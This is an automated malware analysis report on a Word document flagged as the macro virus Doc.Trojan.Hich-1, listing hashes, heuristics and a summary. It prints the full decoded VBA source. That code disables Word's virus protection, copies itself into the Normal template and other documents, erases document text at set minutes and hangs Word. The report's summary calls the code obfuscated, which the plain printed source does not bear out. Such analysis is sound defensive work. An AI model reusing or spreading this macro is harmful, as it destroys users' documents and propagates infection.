Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 743a79513809ab69…

MALICIOUS

Office (OLE)

Size: 36.5 KB
Created: 2000-08-16 07:03:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: da42fff77180374d951e2a4d79a5f4ac
SHA-1: 69768f648bfb41ab368eace699c765ad006916d6
SHA-256: 743a79513809ab69501cfa411c0017f34b0eac59caf9c1880009ffb824cd3d7e
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macros appear to be designed to obfuscate their own code and potentially modify the document content, as indicated by the `CIH` subroutine and the manipulation of document ranges. The `ClamAV: Doc.Trojan.Hich-1` detection further supports its malicious nature. The exact payload or behavior is unclear due to macro obfuscation and truncation.

Heuristics 2

  • ClamAV: Doc.Trojan.Hich-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Hich-1
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1959 bytes
SHA-256: 59f4192feb218fb436f8b6faecf0aaa5106471733837ba9aef0c0a1b72c6dbe3
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    CIH
End Sub

Private Sub CIH()
    On Error Resume Next
    Dim StartLoc, ProcLen, Obj, Str, i, s, Lose
    s = ActiveDocument.Saved: Application.EnableCancelKey = 0
    With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
    
    Set Obj = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
    StartLoc = Obj.ProcStartLine("CIH", 0): ProcLen = Obj.ProcCountLines("CIH", 0)
    Str = Obj.Lines(StartLoc, ProcLen)
    
    Set Obj = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    i = Empty: i = Obj.ProcStartLine("CIH", 0)
    If i <> Empty Then
        Set Obj = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
        i = Empty: i = Obj.ProcStartLine("CIH", 0)
        If i <> Empty Then Obj = ""
    End If
    
    If Obj <> "" Then
        i = Empty: i = Obj.ProcStartLine("Document_Close", 0)
        If i = Empty Then
            Obj.InsertLines Obj.CountOfLines + 1, "Private Sub Document_Close()" & Chr(13) & "    CIH" & Chr(13) & "End Sub"
        Else
            Obj.InsertLines Obj.ProcStartLine("Document_Close", 0) + 1, "    CIH"
        End If
        Obj.InsertLines Obj.CountOfLines + 1, Str
    End If
    
    If Minute(Now) = 1 Then ActiveDocument.Range(ActiveDocument.Characters.Count / 2 * (1 - 0.1 * Rnd), ActiveDocument.Characters.Count / 2 * (1 + 0.1 * Rnd)) = ""
    If Minute(Now) = 26 Then ActiveDocument.Range(0, ActiveDocument.Characters.Count) = "": Lose = True
    If s = False Then ActiveDocument.Save
    If Lose = True And ActiveDocument.Saved Then Do: Loop
    ActiveDocument.Saved = True
End Sub